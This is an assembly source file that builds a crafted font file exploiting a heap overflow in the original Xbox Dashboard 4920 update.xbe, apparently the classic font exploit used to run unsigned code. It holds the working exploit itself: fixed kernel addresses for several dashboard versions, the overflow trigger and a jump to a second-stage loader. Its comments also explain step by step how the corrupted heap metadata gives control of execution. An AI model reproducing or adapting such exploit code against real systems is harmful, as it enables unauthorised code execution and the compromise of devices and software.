;;;
;;; Compile:	nasm -o bert.xtf bert-specific.asm
;;;

		BITS 32


header:	
		db 'XTF0'
		dd 32
		db 'Xbox Book'
		times 32-9 db 0
.data1len	dd 2
		mov edi,[esi-4]
		db 0B8h		; mov eax,
.data2num	dd 0
		jmp short prestart
		nop
		nop
		dw 2, 2
		dd 1000h


; %define VER_1914880		; update.xbe with file size 1914880
%define VER_1974272		; update.xbe with file size 1974272


.value:	
%ifdef VER_1974272
		dd 93C00h-14h
%elifdef VER_1914880
		dd 93C38h-14h
%endif

.address:
; 		dd 80037094h+250h ; MS 5530.01
		dd 80035D24h+250h ; MS 5101.01, EvoX M7
; 		dd 80035C24h+250h ; MS 4817.01
; 		dd 80035C04h+250h ; MS 4627.01
; 		dd 80036A24h+250h ; MS 4034.01
; 		dd 80036964h+250h ; MS 3944.01
; 		dd 8003DA64h+250h ; X2 4983.06


prestart:
	stosd

%ifdef VER_1974272
	push	15594h		; "Xbox" in 16-bit unicode
	mov	eax,29DFAh
%elifdef VER_1914880
	push	155A4h
	mov	eax,29B3Eh
%endif

	call	eax		; load ernie
	jmp	dword [eax+8]	; jump to ernie


;;;
;;; Details for supported update.xbe files:
;;;
;;;     * MS dashboard 4920 with directory xboxdashdata.10027100
;;;       - update.xbe has file size 1914880 and md5sum
;;;         73402a42463766842e56e82b839d5669.
;;;
;;;     * MS dashboard 4920 with directory xboxdashdata.1012A700
;;;       - update.xbe has file size 1974272 and md5sum
;;;         8ab653c39f555758fb65d9014928c4cd.
;;;
;;; 
;;; The following description applies to update.xbe with size 1974272:
;;; 
;;; At one point Dashboard 4920 update.xbe allocates header.data1len amount
;;; of memory (call at memory address 0x2efb5) and then reads
;;; header.data1len-4 bytes of data from bert.xtf. Data will
;;; overflow to the heap arena of the next memory block and beyond.
;;; 
;;; At memory address 0x1a6e3 are the instructions
;;; 
;;; 1a6e3:	89 0a                	mov    %ecx,(%edx)
;;; 1a6e5:	89 51 04             	mov    %edx,0x4(%ecx)
;;;
;;; %edx has been loaded with header.address and %ecx with header.value.
;;; Execution may also take a slightly different path, but still encounter
;;; the same pair of instructions:
;;; 
;;; 1a78a:	89 0a                	mov    %ecx,(%edx)
;;; 1a78c:	89 51 04             	mov    %edx,0x4(%ecx)
;;;
;;; header.address points to a fixed kernel memory location. At the end
;;; of the triggering memory allocation function (malloc), %eax has been
;;; loaded with header.value and the following instruction is executed:
;;; 
;;; 1acd7:	ff 50 14             	call   *0x14(%eax)
;;; 
